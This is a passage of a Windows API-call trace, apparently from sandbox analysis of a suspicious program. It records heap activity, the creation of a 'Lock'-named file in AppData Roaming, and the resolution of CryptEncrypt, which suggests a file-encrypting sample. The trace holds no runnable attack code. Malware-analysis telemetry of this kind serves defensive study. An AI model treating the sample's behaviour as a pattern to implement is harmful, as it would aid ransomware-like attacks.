lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0229.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0229.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0229.765] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0229.765] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0229.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0229.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0229.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0229.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0229.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0229.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0229.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0229.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0229.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0229.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0229.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e56588 [0229.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0229.766] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0229.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0229.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0229.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0229.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04810 [0229.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0229.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0229.768] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.eeVXHty18.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.eevxhty18.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0229.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0229.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0229.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0229.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0229.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0229.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0229.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0229.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0229.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0229.769] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0229.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0229.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0229.769] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0229.770] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0229.770] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0229.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0229.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0229.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0229.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0229.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0229.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0229.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0229.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0229.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0229.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0229.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0229.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0229.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0229.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0229.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe52020 [0229.771] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0229.772] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x2479, lpOverlapped=0x0) returned 1 [0229.774] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0229.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0229.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0229.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0229.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0229.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2479) returned 0x3bf0dd8 [0229.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe52020 | out: hHeap=0x970000) returned 1 [0229.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0229.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0229.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0229.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0229.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0229.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0229.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0229.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0229.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2479) returned 0x3bf3260 [0229.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0dd8 | out: hHeap=0x970000) returned 1 [0229.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0229.775] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0229.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0229.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0229.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0229.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0229.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2479) returned 0x3bf0dd8 [0229.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0229.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0dd8 | out: hHeap=0x970000) returned 1 [0229.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0229.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0229.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0229.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0229.776] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0229.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0229.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0229.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0229.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0229.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0229.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0229.820] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0229.820] TranslateMessage (lpMsg=0x8cf708) returned 0 [0229.820] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0229.820] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0229.821] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0229.821] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0229.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0229.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0229.821] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0229.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0229.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0229.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0229.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ce8 [0229.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0229.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0229.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0229.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0229.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2479) returned 0x3bf0dd8 [0229.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0229.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ef8 [0229.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0229.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0229.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0229.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55048 [0229.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0229.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0229.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0229.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54fe8 [0229.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0229.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0229.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0229.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d88 [0229.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0229.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0229.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0229.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0229.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0229.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2479) returned 0x3bf56e8 [0229.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0229.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0229.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0229.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0229.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0229.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0229.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0229.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0229.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0229.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0229.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0229.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0229.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0229.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0229.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0229.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0229.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0229.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0229.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0229.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0229.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0229.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0229.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0229.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0229.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0229.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0229.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0229.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0229.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0229.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0229.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0229.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0229.825] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.825] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.825] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.825] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.825] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0229.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0229.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0229.825] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0229.825] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0229.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04690 | out: hHeap=0x970000) returned 1 [0229.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0229.826] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0229.826] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0229.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0229.826] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0229.826] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0229.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04118 | out: hHeap=0x970000) returned 1 [0229.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0229.826] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0229.826] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0229.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0229.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0229.826] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0229.826] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.827] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.827] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0229.827] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.827] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0229.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0229.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0229.827] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0229.827] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0229.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0229.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51538, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0229.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0229.828] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0229.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0229.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0229.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e7f698 [0229.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0229.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0229.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0229.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0229.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0229.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0229.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 